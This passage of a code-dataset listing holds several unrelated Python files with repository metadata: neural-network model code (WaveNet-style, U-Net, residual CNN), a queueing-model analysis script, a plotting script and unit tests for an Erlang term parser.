self._name = name
def get_receptive_field(self):
receptive_field = (self.filter_width - 1) * sum(self.dilations) + 1 # due to dilation layers
receptive_field += self.filter_width - 1 # due to input layer (if not 1x1)
if not self.causal:
receptive_field = 2 * receptive_field - 1
return receptive_field
def get_variable_list(self):
return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=self._name)
def _input_layer(self, main_input):
with tf.variable_scope('input_layer'):
r = self.residual_channels
fw = self.filter_width
W = get_weight_variable('W', (fw, self.input_channels, r))
b = get_bias_variable('b', (r))
X = main_input
Y = convolution(X, W, causal=self.causal)
Y += b
Y = tf.tanh(Y)
return Y
def _embed_cond(self, cond_input):
with tf.variable_scope('embed_cond'):
W = get_weight_variable('W', (1, self.cond_channels, self.cond_embed_dim))
b = get_bias_variable('b', (self.cond_embed_dim))
Y = convolution(cond_input, W, causal=self.causal) # 1x1 convolution
Y += b
return tf.tanh(Y)
def _conv_module(self, main_input, module_idx, dilation, cond_input=None):
with tf.variable_scope('conv_modules'):
with tf.variable_scope('module{}'.format(module_idx)):
fw = self.filter_width
r = self.residual_channels
X = main_input
if self.conv_block_gate:
# convolution
W = get_weight_variable('filter_gate_W', (fw, r, 2*r))
b = get_bias_variable('filter_gate_b', (2*r))
Y = convolution(X, W,
dilation=dilation,
causal=self.causal)
Y += b
# conditioning
if self._use_cond:
V = get_weight_variable('cond_filter_gate_W',
(1, self.cond_embed_dim, 2*r))
b = get_bias_variable('cond_filter_gate_b', (2*r))
C = convolution(cond_input, V) # 1x1 convolution
Y += C + b
if self.add_noise_at_each_layer:
W = get_weight_variable('noise_scaling_W',
(1, 1, r))
Z = tf.random_normal(shape=tf.shape(Y[..., :r]))
Y += tf.concat([W * Z, tf.zeros_like(Y[..., r:])], axis=-1)
# filter and gate
Y = tf.tanh(Y[..., :r]) * tf.sigmoid(Y[..., r:])
else:
# convolution
W = get_weight_variable('filter_gate_W', (fw, r, r))
b = get_bias_variable('filter_gate_b', (r))
Y = convolution(X, W,
dilation=dilation,
causal=self.causal)
Y += b
# conditioning
if self._use_cond:
V = get_weight_variable('cond_filter_gate_W',
(1, self.cond_embed_dim, r))
b = get_bias_variable('cond_filter_gate_b', (r))
C = convolution(cond_input, V) # 1x1 convolution
Y += C + b
if self.add_noise_at_each_layer:
W = get_weight_variable('noise_scaling_W',
(1, 1, r))
Z = tf.random_normal(shape=tf.shape(Y))
Y += W * Z
# activation
Y = tf.tanh(Y)
skip_out = Y
if self.conv_block_affine_out:
W = get_weight_variable('output_W', (1, r, r))
b = get_bias_variable('output_b', (r))
Y = convolution(Y, W) + b
# residual connection
Y += X
return Y, skip_out
def _postproc_module(self, residual_module_outputs):
with tf.variable_scope('postproc_module'):
s = self.postnet_channels
r = self.residual_channels
d = len(self.dilations)
# concat and convolve
W1 = get_weight_variable('W1', (1, d*r, s))
b1 = get_bias_variable('b1', s)
X = tf.concat(residual_module_outputs, axis=-1) # concat along channel dim
Y = convolution(X, W1)
Y += b1
Y = tf.nn.tanh(Y)
# output layer
W2 = get_weight_variable('W2', (1, s, self.output_channels))
b2 = get_bias_variable('b2', self.output_channels)
Y = convolution(Y, W2)
Y += b2
return Y
def forward_pass(self, X_input, cond_input=None):
skip_outputs = []
with tf.variable_scope(self._name, reuse=tf.AUTO_REUSE):
if self._use_cond:
C = self._embed_cond(cond_input)
else:
C = None
R = self._input_layer(X_input)
X = R
for i, dilation in enumerate(self.dilations):
X, skip = self._conv_module(X, i, dilation, cond_input=C)
skip_outputs.append(skip)
Y = self._postproc_module(skip_outputs)
return Y
| 34.543071
| 117
| 0.541364
|
0c1c909331ca19bc05feaf4cf513f360b5d269e9
| 2,818
|
py
|
Python
|
model/analyze/01-single-analysis.py
|
pacslab/conc-value-perf-modelling
|
156320c3e9669149b10ea54d5ac0a1de8d0a7013
|
[
"MIT"
] | null | null | null |
model/analyze/01-single-analysis.py
|
pacslab/conc-value-perf-modelling
|
156320c3e9669149b10ea54d5ac0a1de8d0a7013
|
[
"MIT"
] | null | null | null |
model/analyze/01-single-analysis.py
|
pacslab/conc-value-perf-modelling
|
156320c3e9669149b10ea54d5ac0a1de8d0a7013
|
[
"MIT"
] | null | null | null |
# %% Imports
import sys
import numpy as np
import matplotlib.pyplot as plt
import scipy as sp
import pandas as pd
import itertools
from tqdm.auto import tqdm
# import concperf by adding its path
sys.path.append('..')
from concperf import single_model
from concperf import utility
# %% create config
config = {
"base_service_time": 1,
"alpha": 1,
"max_conc": 100,
"arrival_rate_server": 1,
}
figs_folder = 'figs/'
results_folder = 'results/'
# %% adding functionality for solving for a specific configuration
def process_config(config, arrival_rate, alpha):
model_config = { **config }
model_config.update({
"arrival_rate_server": arrival_rate,
"alpha": alpha,
})
single_coder = single_model.StateCoder(config=model_config)
Q = single_model.get_single_container_q(single_coder, config=model_config)
# for steady-state probability:
# req_count_prob = utility.solve_CTMC(Q)
# for transient solution:
# our initial state
state_count = Q.shape[0]
init_state = np.zeros(state_count)
init_state[0] = 1
max_t = 60
state_probs = init_state @ sp.linalg.expm(Q * max_t)
state_req_counts = [s[0] for s in single_coder.get_state_list()]
req_count_avg = (state_probs * state_req_counts).sum()
return {
"state_probs": state_probs,
"state_req_counts": state_req_counts,
"req_count_avg": req_count_avg,
"arrival_rate": arrival_rate,
"alpha": alpha,
}
# print the keys
process_config(config, 1, 1).keys()
# %% process for different values
from concurrent.futures import ProcessPoolExecutor, as_completed
if __name__ == "__main__":
arrival_rates = np.linspace(0.1, 20, 100)
alphas = [0.01, 0.05, 0.1, 0.5, 1]
df_data = itertools.product(arrival_rates, alphas)
futures = []
with ProcessPoolExecutor(max_workers=1) as pool:
for arrival_rate, alpha in df_data:
future = pool.submit(process_config, config, arrival_rate, alpha)
futures.append(future)
# get the future results as they are completed
results = [f.result() for f in as_completed(futures)]
# %% create plots
def save_fig(figname):
plt.savefig(figs_folder + figname + ".png", dpi=600)
plt.savefig(figs_folder + figname + ".pdf")
if __name__ == "__main__":
df = pd.DataFrame(results)
df.to_csv(results_folder + '01_conc_vs_arrival_alpha.csv')
for alpha in alphas:
sub_df = df[df['alpha'] == alpha]
sub_df = sub_df.sort_values('arrival_rate')
plt.plot(sub_df['arrival_rate'], sub_df['req_count_avg'], label=f"Alpha={alpha}")
plt.ylim((0, 80))
plt.ylabel('Concurrency')
plt.xlabel('Arrival Rate Per Container')
plt.grid(True)
plt.legend()
save_fig('01_conc_vs_arrival_alpha')
| 28.464646
| 89
| 0.678141
|
162942e762bda5d0c98cb313a3eb19a92d897ebd
| 10,341
|
py
|
Python
|
twotp/test/test_parser.py
|
lunay001/TwOTP
|
8c5d6437f30678926b87c3b015b5aa4df70f2349
|
[
"MIT"
] | null | null | null |
twotp/test/test_parser.py
|
lunay001/TwOTP
|
8c5d6437f30678926b87c3b015b5aa4df70f2349
|
[
"MIT"
] | null | null | null |
twotp/test/test_parser.py
|
lunay001/TwOTP
|
8c5d6437f30678926b87c3b015b5aa4df70f2349
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2007-2009 Thomas Herve <therve@free.fr>.
# See LICENSE for details.
"""
Parser tests.
"""
from twotp.term import Atom, Tuple, Pid, Reference, Integer, List
from twotp.term import Float, Port, Binary, Fun, NewFun, Export, BitBinary
from twotp.parser import Parser, RemainingDataError, UnhandledCode
from twotp.test.util import TestCase
class ParseTestCase(TestCase):
"""
Test parsing various data.
"""
def setUp(self):
"""
Create a parser instance.
"""
self.parser = Parser()
def test_parseAtom(self):
"""
Try to parse the binary representation of an atom.
"""
self.assertEqual(
self.parser.binaryToTerm("d\x00\x03foo"), (Atom("foo"), ""))
def test_parseString(self):
"""
Try to parse the binary representation of a short string object.
"""
self.assertEqual(
self.parser.binaryToTerm("k\x00\x04dang"),
([100, 97, 110, 103], ""))
def test_parseNil(self):
"""
Try to parse NIL value.
"""
self.assertEqual(self.parser.binaryToTerm("j"), (List([]), ""))
def test_parseList(self):
"""
Try to parse a list of integers.
"""
self.assertEqual(
self.parser.binaryToTerm("l\x00\x00\x00\x02a\x01a\x02j"),
(List([1, 2]), ""))
def test_parseSmallTuple(self):
"""
Test parsing a small tuple of integer values.
"""
self.assertEqual(
self.parser.binaryToTerm("h\x02a\x05a\x04"), (Tuple([5, 4]), ""))
def test_parseLargeTuple(self):
"""
Try parsing a large tuple of integers.
"""
self.assertEqual(
self.parser.binaryToTerm("i\x00\x00\x00\x02a\x05a\x04"),
(Tuple([5, 4]), ""))
def test_parseLargeBig(self):
"""
Try parsing a positive and negative big integer. The only difference
between the two binary values is the sign bit.
"""
self.assertEqual(
self.parser.binaryToTerm("o\x00\x00\x00\x04\x00\x01\x02\x03\x04"),
(Integer(67305985), ""))
self.assertEqual(
self.parser.binaryToTerm("o\x00\x00\x00\x04\x01\x01\x02\x03\x04"),
(Integer(-67305985), ""))
def test_parseSmallBig(self):
"""
Try parsing a positive and negative small big integer. The only
difference between the two binary values is the sign bit.
"""
self.assertEqual(self.parser.binaryToTerm(
"n\x04\x00\x01\x02\x03\x04"), (Integer(67305985), ""))
self.assertEqual(self.parser.binaryToTerm(
"n\x04\x01\x01\x02\x03\x04"), (Integer(-67305985), ""))
def test_parseFloat(self):
"""
Test parsing a float null terminated.
"""
self.assertEqual(
self.parser.binaryToTerm(
"c\x31\x32\x2e\x33\x34\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00"),
(Float(12.34), ""))
def test_parseBigFloat(self):
"""
Try to parse a float without null character.
"""
self.assertEqual(
self.parser.binaryToTerm(
"c\x31\x32\x2e\x33\x34\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32"),
(Float(12.34222222222222222222222222222), ""))
self.assertEqual(
self.parser.binaryToTerm("c-5.6779999999999999360"
"5e+00\x00\x00\x00\x00"),
(Float(-5.678), ""))
def test_parseInteger(self):
"""
Test parsing a standard integer on 32 bits.
"""
self.assertEqual(
self.parser.binaryToTerm("b\x00\x00\x00\x0f"), (Integer(15), ""))
self.assertEqual(
self.parser.binaryToTerm("b\xff\xff\xff\xff"), (Integer(-1), ""))
self.assertEqual(
self.parser.binaryToTerm("b\xff\xff\xff\xfe"), (Integer(-2), ""))
def test_parseSmallInteger(self):
"""
Try to parse a small integer on 1 byte.
"""
self.assertEqual(self.parser.binaryToTerm("a\x0e"), (Integer(14), ""))
def test_parseNewReference(self):
"""
Parse a new reference binary representation: the reference ID is an
array of integers.
"""
r = Reference(Atom('bar'), [3, 4], 1)
self.assertEqual(
self.parser.binaryToTerm("r\x00\x02d\x00\x03bar"
"\x01\x00\x00\x00\x03\x00\x00\x00\x04"),
(r, ""))
def test_parseReference(self):
"""
Parse a reference binary representation: the reference ID is only an
integer.
"""
r = Reference(Atom('foo'), 5, 1)
self.assertEqual(
self.parser.binaryToTerm("ed\x00\x03foo"
"\x00\x00\x00\x05\x01"),
(r, ""))
def test_parsePort(self):
"""
Parse a Port binary representation.
"""
r = Port(Atom('egg'), 12, 0)
self.assertEqual(
self.parser.binaryToTerm("fd\x00\x03egg\x00\x00\x00\x0c\x04"),
(r, ""))
def test_parseBinary(self):
"""
Parse a binary object representation.
"""
self.assertEqual(
self.parser.binaryToTerm("m\x00\x00\x00\x03egg"),
(Binary("egg"), ""))
def test_parseFun(self):
"""
Try to parse a Fun object.
"""
f = Fun(Pid(Atom('foo'), 1234, 56, 2), Atom("spam"), 12, 34,
[Atom("bar"), Atom("bim")])
self.assertEqual(
self.parser.binaryToTerm(
"u\x00\x00\x00\x02gd\x00\x03foo"
"\x00\x00\x04\xd2\x00\x00\x008\x02d\x00\x04spama\x0ca\x22"
"d\x00\x03bard\x00\x03bim"),
(f, ""))
def test_parseNewFun(self):
"""
Try to parse a NewFun object: it has specific ID fields.
"""
f = NewFun(Pid(Atom('foo'), 1234, 56, 2), Atom("spam"), 1,
'1234567890123456', 1, 2, 12, 34,
[Atom("bar"), Atom("bim")])
self.assertEqual(
self.parser.binaryToTerm(
"p\x00\x00\x00\x02\x01"
"1234567890123456\x00\x00\x00\x01\x00\x00\x00\x02d\x00\x04spam"
"a\x0ca\x22gd\x00\x03foo\x00\x00\x04\xd2\x00\x00\x008\x02"
"d\x00\x03bard\x00\x03bim"),
(f, ""))
def test_parseNewCache(self):
"""
Try to parse a NewCache object: it should correctly extract it and
put it in the cache.
"""
# This doesn't put it in the cache
a = Atom("spam")
self.assertEqual(
self.parser.binaryToTerm("N\x03\x00\x04spam"), (a, ""))
# Retrieve the value from cache
b = Atom(None, 3)
self.assertEqual(a, b)
def test_parseCachedAtom(self):
"""
Try to parse a Cached object: if not in the cache, this should raise
an exception, and if found it should retrieve it.
"""
self.assertRaises(KeyError, self.parser.binaryToTerm, "C\x08")
a = Atom("foo", 8)
self.assertEqual(self.parser.binaryToTerm("C\x08"), (a, ""))
def test_unhandledCode(self):
"""
Check that trying to parse invalid data raises an exception.
"""
self.assertRaises(UnhandledCode, self.parser.binaryToTerm, "Dfoo")
def test_parseVersion(self):
"""
Version shouldn't be managed by the parser
"""
self.assertRaises(RuntimeError, self.parser.binaryToTerm, "\x83foo")
def test_parseExport(self):
"""
Test parsing an export term.
"""
e = Export(Atom("bar"), Atom("foo"), Integer(2))
self.assertEqual(
self.parser.binaryToTerm("qd\x00\x03bard\x00\x03fooa\x02"),
(e, ""))
def test_parseBitBinary(self):
"""
Test parsing a bit binary object.
"""
b = BitBinary("\x04\x04\x04", 19)
self.assertEqual(
self.parser.binaryToTerm("M\x00\x00\x00\x03\x13\x04\x04\x04"),
(b, ""))
def test_parseDict(self):
"""
Test parsing a dict object.
"""
data = (
"\x83h\td\x00\x04dicta\x02a\x10a\x10a\x08aPa0h\x10jjjjjjjjjjjjjjjj"
"h\x01h\x10l\x00\x00\x00\x01l\x00\x00\x00\x02d\x00\x04spama\x01j"
"jl\x00\x00\x00\x01l\x00\x00\x00\x02d\x00\x03fook\x00\x03bar"
"jjjjjjjjjjjjjjjj")
self.assertEqual(
list(self.parser.binaryToTerms(data)),
[{Atom("foo"): [98, 97, 114], Atom("spam"): 1}])
def test_parseSet(self):
"""
Test parsing a set object.
"""
data = (
"\x83h\td\x00\x03seta\x02a\x10a\x10a\x08aPa0h\x10jjjjjjjjjjjjjjjj"
"h\x01h\x10l\x00\x00\x00\x01d\x00\x03barjl\x00\x00\x00\x01d\x00"
"\x03foojjjjjjjjjjjjjjj")
self.assertEqual(
list(self.parser.binaryToTerms(data)),
[set([Atom("bar"), Atom("foo")])])
def test_binaryToTerms(self):
"""
Try to parse a full binary stream.
"""
self.assertEqual(
list(self.parser.binaryToTerms("\x83d\x00\x03foo")),
[Atom("foo")])
def test_remainingData(self):
"""
If too much data is given, it should raise a C{RemainingDataError}
exception.
"""
self.assertRaises(
RemainingDataError, list,
self.parser.binaryToTerms("\x83d\x00\x03foo\x01"))
def test_compressedData(self):
"""
The parser is able to handle compressed data.
"""
self.assertEqual(
self.parser.binaryToTerm("P\x00\x00\x00\x12x\x9c\xcbf\xe0\xaf@"
"\x05\x00@\xc8\x07\x83"),
([120] * 15, ""))
def test_parseNewFloat(self):
"""
Try to parse a new float.
"""
self.assertEqual(
self.parser.binaryToTerm('F?\xf3\xae\x14z\xe1G\xae'), (1.23, ""))
| 30.325513
| 79
| 0.54163
|
be17390c79761367254aa42e4546bd6b40e5b260
| 2,010
|
py
|
Python
|
messungen/noverplot.py
|
tihmstar/gido_public
|
dcc523603b9a27b37752211715a10e30b51ce812
|
[
"Unlicense"
] | 16
|
2021-04-10T16:28:00.000Z
|
2021-12-12T10:15:23.000Z
|
messungen/noverplot.py
|
tihmstar/gido_public
|
dcc523603b9a27b37752211715a10e30b51ce812
|
[
"Unlicense"
] | null | null | null |
messungen/noverplot.py
|
tihmstar/gido_public
|
dcc523603b9a27b37752211715a10e30b51ce812
|
[
"Unlicense"
] | 2
|
2021-04-10T16:32:36.000Z
|
2021-04-11T14:13:45.000Z
|
import struct
import sys
import matplotlib.pyplot as plt
import numpy as np
import mmap
import os
fontsize = 30
ticksize = 3
legendsize = 18
POINTS_END = None
if len(sys.argv) < 2:
print("Usage: %s <path ....>" %(sys.argv[0]))
for p in sys.argv[1:]:
file = p
filename = file.split("/")[-1]
try:
lastdir = file.split("/")[-2]
except:
lastdir = filename
try:
prepredir = file.split("/")[-3]
except:
prepredir = filename
arr = np.memmap(file, dtype='float64', mode='r')
r = "byte_"+filename.split("_")[-1]
# if POINTS_END:
# plt.plot(arr[0:POINTS_END], label=r)
# else:
## plt.plot(arr, label=r)
# plt.plot(arr, linestyle="", markersize=1, marker='.')
#plt.plot([4.5]*len(arr))
#plt.plot([-4.5]*len(arr))
maxpos = 0
maxval = 0
avgval = 0.0
avgcnt = 0.0
for i in range(len(arr)):
if abs(arr[i]) > maxval:
maxval = abs(arr[i])
maxpos = i
avgcnt += 1
avgval += (arr[i]-avgval)/avgcnt
aa = [None]*len(arr)
aa[maxpos] = arr[maxpos]
plt.plot(aa, linestyle="", markersize=20, marker='.', label=r)
print("Maxpos=%3d maxval=%f avgval=%f file=%s"%(maxpos,maxval,avgval,filename))
leg = plt.legend(loc="upper right", fontsize=legendsize)
for legobj in leg.legendHandles:
legobj.set_linewidth(ticksize)
ax = plt.axes()
ax.xaxis.offsetText.set_fontsize(fontsize)
ax.xaxis.set_tick_params(width=ticksize,length=ticksize*2)
ax.yaxis.offsetText.set_fontsize(fontsize)
ax.yaxis.set_tick_params(width=ticksize,length=ticksize*2)
f = plt.figure(1)
addval = 0.04
plt.subplots_adjust(left=f.subplotpars.left+addval, right=f.subplotpars.right+addval)
plt.xticks(fontsize=fontsize)
plt.yticks(fontsize=fontsize)
plt.xlabel('Samples', fontsize=fontsize)
plt.ylabel('Correlation', fontsize=fontsize)
#plt.title(lastdir.replace("_","-"), fontsize=fontsize)
#plt.savefig("traces_"+filename.replace(".dat",".png"))
plt.show()
| 23.647059
| 85
| 0.635323
|
c8ff8970d2282ace1d1293b887f16c5f6742fd0d
| 4,862
|
py
|
Python
|
model/shared_conv.py
|
chenzhuomit/6.860_final_project
|
5218b5ba127b8f36bbcf901ee8b3e97a8a8eaa3b
|
[
"MIT"
] | null | null | null |
model/shared_conv.py
|
chenzhuomit/6.860_final_project
|
5218b5ba127b8f36bbcf901ee8b3e97a8a8eaa3b
|
[
"MIT"
] | null | null | null |
model/shared_conv.py
|
chenzhuomit/6.860_final_project
|
5218b5ba127b8f36bbcf901ee8b3e97a8a8eaa3b
|
[
"MIT"
] | null | null | null |
import torch
from torch import nn
from torch.nn import functional as F
from .resnet import ResNet
class SharedResBlock(nn.Module):
def __init__(self, hidden_channels, kernel_size, batch_norm=True, resnet=True, dropout=0.):
super().__init__()
self.hidden_channels = hidden_channels
self.kernel_size = kernel_size
self.padding = kernel_size // 2 if kernel_size % 2 == 1 else (kernel_size // 2, kernel_size // 2 - 1)
self.batch_norm = batch_norm
self.resnet = resnet
self.dropout = dropout
layers = []
layers.append(nn.Conv2d(hidden_channels, hidden_channels, kernel_size, padding=self.padding))
if batch_norm:
layers.append(nn.BatchNorm2d(hidden_channels))
layers.append(nn.Dropout(dropout))
layers.append(nn.LeakyReLU())
layers.append(nn.Conv2d(hidden_channels, hidden_channels, kernel_size, padding=self.padding))
if batch_norm:
layers.append(nn.BatchNorm2d(hidden_channels))
layers.append(nn.Dropout(dropout))
layers.append(nn.LeakyReLU())
layers.append(nn.Conv2d(hidden_channels, hidden_channels, kernel_size, padding=self.padding))
if batch_norm:
layers.append(nn.BatchNorm2d(hidden_channels))
layers.append(nn.Dropout(dropout))
self.resblock = ResNet(nn.Sequential(*layers), resnet=resnet)
def forward(self, x):
return F.leaky_relu(self.resblock(x))
def count_params(self):
return sum(p.numel() for p in self.parameters())
class SharedConvLayer(nn.Module):
def __init__(self, in_channels, hidden_channels, out_channels, kernel_size1, kernel_size2, kernel_size3, batch_norm=True, pooling=True, resnet=True, dropout=0.):
super().__init__()
self.in_channels = in_channels
self.hidden_channels = hidden_channels
self.kernel_size1 = kernel_size1
self.kernel_size2 = kernel_size2
self.kernel_size3 = kernel_size3
self.padding1 = kernel_size1 // 2 if kernel_size1 % 2 == 1 else (kernel_size1 // 2, kernel_size1 // 2 - 1)
self.padding3 = kernel_size3 // 2 if kernel_size1 % 2 == 1 else (kernel_size3 // 2, kernel_size3 // 2 - 1)
self.batch_norm = batch_norm
self.pooling = pooling
self.resnet = resnet
self.dropout = dropout
layers = []
layers.append(nn.Conv2d(in_channels, hidden_channels, self.kernel_size1, padding=self.padding1))
if batch_norm:
layers.append(nn.BatchNorm2d(hidden_channels))
layers.append(nn.Dropout(dropout))
layers.append(nn.LeakyReLU())
if pooling:
layers.append(nn.MaxPool2d(2))
layers.append(SharedResBlock(hidden_channels, self.kernel_size2, batch_norm, resnet, dropout))
if pooling:
layers.append(nn.MaxPool2d(2))
layers.append(nn.Conv2d(hidden_channels, out_channels, self.kernel_size3, padding=self.padding3))
if batch_norm:
layers.append(nn.BatchNorm2d(out_channels))
layers.append(nn.Dropout(dropout))
layers.append(nn.LeakyReLU())
if pooling:
layers.append(nn.MaxPool2d(2))
self.net = nn.Sequential(*layers)
def forward(self, x):
return self.net(x)
def count_params(self):
return sum(p.numel() for p in self.parameters())
class SharedConvNet(nn.Module):
def __init__(self, in_channels, hidden_channels, out_channels, kernel_size1, kernel_size2, kernel_size3, intermediate_dim, nb_classes, batch_norm=True, pooling=True, resnet=True, dropout=0., convdropout=0.):
super().__init__()
self.in_channels = in_channels
self.hidden_channels = hidden_channels
self.intermidiate_dim = intermediate_dim
self.nb_classes = nb_classes
self.batch_norm = batch_norm
self.pooling = pooling
self.resnet = resnet
self.dropout = dropout
self.convdropout = convdropout
self.convlayer = SharedConvLayer(in_channels, hidden_channels, out_channels, kernel_size1, kernel_size2, kernel_size3, batch_norm, pooling, resnet, convdropout)
if pooling:
self.conv_out_dim = 4 * 4 * out_channels
else:
self.conv_out_dim = 32 * 32 * out_channels
fflayer = []
fflayer.append(nn.Linear(self.conv_out_dim, intermediate_dim))
fflayer.append(nn.Dropout(dropout))
fflayer.append(nn.LeakyReLU())
fflayer.append(nn.Linear(intermediate_dim, nb_classes))
self.fflayer = nn.Sequential(*fflayer)
def forward(self, x):
y = self.convlayer(x)
y = y.view(y.shape[0], -1)
return self.fflayer(y)
def count_params(self):
return sum(p.numel() for p in self.parameters())
| 43.026549
| 211
| 0.657754
|
3d56b1ce0b982af7e6b2409dbdd4215956836d27
| 8,698
|
py
|
Python
|
nn/unet.py
|
bohaohuang/ersa
|
e13ceae16929362f5ef49db1ab0f3237855aa2ac
|
[
"MIT"
] | null | null | null |
nn/unet.py
|
bohaohuang/ersa
|
e13ceae16929362f5ef49db1ab0f3237855aa2ac
|
[
"MIT"
] | null | null | null |
nn/unet.py
|
bohaohuang/ersa
|
e13ceae16929362f5ef49db1ab0f3237855aa2ac
|
[
"MIT"
] | 1
|
2020-07-01T16:54:11.000Z
|
2020-07-01T16:54:11.000Z
|
import os
import tensorflow as tf
from nn import basicNetwork
from nn import nn_utils
class UNet(basicNetwork.SegmentationNetwork):
"""
Implements the U-Net from https://arxiv.org/pdf/1505.04597.pdf
"""
def __init__(self, class_num, input_size, dropout_rate=None, name='unet', suffix='', learn_rate=1e-4,
decay_step=60, decay_rate=0.1, epochs=100, batch_size=5, start_filter_num=32):
"""
Initialize the object
:param class_num: class number in labels, determine the # of output units
:param input_size: input patch size
:param dropout_rate: dropout rate in each layer, if it is None, no dropout will be used
:param name: name of this network
:param suffix: used to create a unique name of the network
:param learn_rate: start learning rate
:param decay_step: #steps before the learning rate decay
:param decay_rate: learning rate will be decayed to lr*decay_rate
:param epochs: #epochs to train
:param batch_size: batch size
:param start_filter_num: #filters at the first layer
"""
self.sfn = start_filter_num
super().__init__(class_num, input_size, dropout_rate, name, suffix, learn_rate, decay_step,
decay_rate, epochs, batch_size)
def create_graph(self, feature, **kwargs):
"""
Create graph for the U-Net
:param feature: input image
:param start_filter_num: #filters at the start layer, #filters in U-Net grows exponentially
:return:
"""
sfn = self.sfn
# downsample
conv1, pool1 = nn_utils.conv_conv_pool(feature, [sfn, sfn], self.mode, name='conv1',
padding='valid', dropout=self.dropout_rate)
conv2, pool2 = nn_utils.conv_conv_pool(pool1, [sfn * 2, sfn * 2], self.mode, name='conv2',
padding='valid', dropout=self.dropout_rate)
conv3, pool3 = nn_utils.conv_conv_pool(pool2, [sfn * 4, sfn * 4], self.mode, name='conv3',
padding='valid', dropout=self.dropout_rate)
conv4, pool4 = nn_utils.conv_conv_pool(pool3, [sfn * 8, sfn * 8], self.mode, name='conv4',
padding='valid', dropout=self.dropout_rate)
conv5 = nn_utils.conv_conv_pool(pool4, [sfn * 16, sfn * 16], self.mode, name='conv5', pool=False,
padding='valid', dropout=self.dropout_rate)
# upsample
up6 = nn_utils.crop_upsample_concat(conv5, conv4, 8, name='6')
conv6 = nn_utils.conv_conv_pool(up6, [sfn * 8, sfn * 8], self.mode, name='up6', pool=False,
padding='valid', dropout=self.dropout_rate)
up7 = nn_utils.crop_upsample_concat(conv6, conv3, 32,name='7')
conv7 = nn_utils.conv_conv_pool(up7, [sfn * 4, sfn * 4], self.mode, name='up7', pool=False,
padding='valid', dropout=self.dropout_rate)
up8 = nn_utils.crop_upsample_concat(conv7, conv2, 80, name='8')
conv8 = nn_utils.conv_conv_pool(up8, [sfn * 2, sfn * 2], self.mode, name='up8', pool=False,
padding='valid', dropout=self.dropout_rate)
up9 = nn_utils.crop_upsample_concat(conv8, conv1, 176, name='9')
conv9 = nn_utils.conv_conv_pool(up9, [sfn, sfn], self.mode, name='up9', pool=False,
padding='valid', dropout=self.dropout_rate)
self.pred = tf.layers.conv2d(conv9, self.class_num, (1, 1), name='final', activation=None, padding='same')
self.output = tf.nn.softmax(self.pred)
@staticmethod
def get_overlap():
"""
Get #pixels overlap between two output images
This is necessary to determine how patches are extracted
:return:
"""
return 184
@staticmethod
def is_valid_patch_size(ps):
"""
Due to the existence of cropping and pooling, U-Net cannot take arbitrary input size
This function determines if a input size is a valid input size, other wise return closest valid size
:param ps: input patch size, should be a tuple
:return: True if ps is valid, otherwise the closest valid input size
"""
if (ps[0] - 124) % 32 == 0 and (ps[1] - 124) % 32 == 0:
return True
else:
ps_0 = (ps[0] - 124) // 32 + 124
ps_1 = (ps[1] - 124) // 32 + 124
return tuple([ps_0, ps_1])
@ staticmethod
def load_weights(ckpt_dir, layers2load):
"""
This is different from network.load(). This function only loads specified layers
:param ckpt_dir: path to the model to load
:param layers2load: could be a list, or string where numbers separated by ,
:return:
"""
layers_list = []
if isinstance(layers2load, str):
layers2load = [int(a) for a in layers2load.split(',')]
for layer_id in layers2load:
assert 1 <= layer_id <= 9
if layer_id <= 5:
prefix = 'layerconv'
else:
prefix = 'layerup'
layers_list.append('{}{}'.format(prefix, layer_id))
load_dict = {}
for layer_name in layers_list:
feed_layer = layer_name + '/'
load_dict[feed_layer] = feed_layer
try:
latest_check_point = tf.train.latest_checkpoint(ckpt_dir)
tf.contrib.framework.init_from_checkpoint(ckpt_dir, load_dict)
print('loaded {}'.format(latest_check_point))
except tf.errors.NotFoundError:
with open(os.path.join(ckpt_dir, 'checkpoint'), 'r') as f:
ckpts = f.readlines()
ckpt_file_name = ckpts[0].split('/')[-1].strip().strip('\"')
latest_check_point = os.path.join(ckpt_dir, ckpt_file_name)
tf.contrib.framework.init_from_checkpoint(latest_check_point, load_dict)
print('loaded {}'.format(latest_check_point))
def make_loss(self, label, loss_type='xent', **kwargs):
"""
Make loss to optimize for the network
U-Net's output is smaller than input, thus ground truth need to be cropped
:param label: input labels, can be generated by tf.data.Dataset
:param loss_type:
xent: cross entropy loss
:return:
"""
with tf.variable_scope('loss'):
pred_flat = tf.reshape(self.pred, [-1, self.class_num])
_, w, h, _ = label.get_shape().as_list()
y = tf.image.resize_image_with_crop_or_pad(label, w - self.get_overlap(), h - self.get_overlap())
y_flat = tf.reshape(tf.squeeze(y, axis=[3]), [-1, ])
indices = tf.squeeze(tf.where(tf.less_equal(y_flat, self.class_num - 1)), 1)
gt = tf.gather(y_flat, indices)
prediction = tf.gather(pred_flat, indices)
pred = tf.argmax(prediction, axis=-1, output_type=tf.int32)
if self.class_num == 2:
self.loss_iou = self.create_resetable_metric_single_iou(scope=tf.get_variable_scope().name,
labels=gt, predictions=pred, num_classes=self.class_num, name='loss_iou')
else:
self.loss_iou = self.create_resetable_metric(tf.metrics.mean_iou, var_name='loss_iou',
scope=tf.get_variable_scope().name,
labels=gt, predictions=pred, num_classes=self.class_num,
name='loss_iou')
if loss_type == 'xent':
if 'pos_weight' in kwargs:
self.loss = tf.reduce_mean(tf.nn.weighted_cross_entropy_with_logits(
logits=prediction, labels=gt, pos_weight=kwargs['pos_weight']))
else:
self.loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=prediction, labels=gt))
self.loss_xent = self.create_resetable_metric(tf.metrics.mean, var_name='loss_xent',
scope=tf.get_variable_scope().name,
values=self.loss, name='loss_xent')
else:
# TODO focal loss:
# https://github.com/ailias/Focal-Loss-implement-on-Tensorflow/blob/master/focal_loss.py
self.loss = None
| 51.164706
| 117
| 0.57381
|
cf82c65798c705b2bc67382367b8caae76726a4b
| 53,961
|
py
|
Python
|
mne/channels/channels.py
|
massich/mne-python
|
9afcbcb21ca5df53eaf26911d0199dcc04bfc4ba
|
[
"BSD-3-Clause"
] | null | null | null |
mne/channels/channels.py
|
massich/mne-python
|
9afcbcb21ca5df53eaf26911d0199dcc04bfc4ba
|
[
"BSD-3-Clause"
] | 23
|
